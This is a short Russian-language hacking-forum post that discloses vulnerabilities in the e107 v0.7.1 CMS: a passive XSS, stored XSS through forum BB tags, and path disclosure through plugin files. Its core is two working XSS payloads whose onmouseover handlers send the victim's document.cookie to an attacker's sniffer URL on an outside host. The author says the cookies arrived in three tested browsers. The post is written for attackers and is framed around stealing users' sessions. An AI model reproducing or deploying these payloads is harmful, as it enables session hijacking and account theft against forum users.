Многочисленные уязвимости e107 v0.7.1 RE _http://e107.ru/ 1. Пасивная XSS Толку от неё мало, но вдруг кому-нибудь понадобится 2. Активные XSS Здесь всё более серьёзно... Итак, уязвимы bb теги, фильтруется символ < и иногда ", остальное пропускается. а) На выходе получаем: PHP: <span style='font-size:22px' onmouseover='img = new Image(); img.src = "http://site.ru/cgi-bin/s.jpg?"+document.cookie;' px'>xss</span> Как только жертва проводит мышкой по ссылке, cookies отправляются на ваш сниффер. б) На выходе получаем: PHP: <img src='http://www.lifecity.us/phpBB2/images/smiles/icon_smile.gif' onmouseover='img = new Image(); img.src = 'http://site.ru/cgi-bin/s.jpg?'+document.cookie;' ' class='bbcode' alt='' style='vertical-align:middle; border:0' /> Как только жертва проводит мышкой по картинке, cookies отправляются на ваш сниффер. Эти bb теги используются для написания сообщений на форуме, и изменения данных в профиле. Все было проверено мной на: IE 7 Beta, Opera 8.54 и Firefox 1.5.0.3, все cookies пришли 3. Раскрытие пути На закуску _http://e107.ru/e107_plugins/content/plugin.php _http://e107.ru/e107_plugins/list_new/plugin.php Их очень много, в основном в файлах, находящихся в папке e107_plugins. Antichat.ru © VectorG